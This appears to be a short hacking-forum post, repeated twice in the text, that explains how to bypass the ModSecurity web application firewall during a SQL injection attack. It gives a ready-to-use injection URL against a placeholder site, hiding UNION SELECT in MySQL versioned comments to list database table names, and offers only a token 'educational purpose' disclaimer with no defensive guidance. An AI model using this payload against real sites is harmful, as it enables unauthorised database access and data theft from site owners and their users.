Salam all.
Today i will show you how to bypass Mod_Security WAF for SQLi attack.
Probably, most of you did querie UNION SELECT 1,2,3,4... etc and saw message like "Not Acceptable!"
Take a look at following picture:
![[Image: LJCfl5M.jpg]](https://lh3-testonly.googleusercontent.com/blogger_img_proxy/AEn0k_vrfZevjpe1ASqXoe0RAdoIQ7Jfr-Jm_rysmm3ngYbPwwp9ajkQN9_fhm9QEFVpW39GTBerGGoQpS5xAVDPf0gL=s0-d)
This message is generated by WAF called Mod_Security and here is solution how you can bypass this WAF:
http://www.vulnsite.com/index.php?id=-13+/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!50000%280x3c62723e,table_name%29*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
Hope this will be Help fuLL
NOTE: This is for educational purpose, any illegal activities through this is on your own risk.
Today i will show you how to bypass Mod_Security WAF for SQLi attack.
Probably, most of you did querie UNION SELECT 1,2,3,4... etc and saw message like "Not Acceptable!"
Take a look at following picture:
This message is generated by WAF called Mod_Security and here is solution how you can bypass this WAF:
http://www.vulnsite.com/index.php?id=-13+/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!50000%280x3c62723e,table_name%29*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
Hope this will be Help fuLL
NOTE: This is for educational purpose, any illegal activities through this is on your own risk.
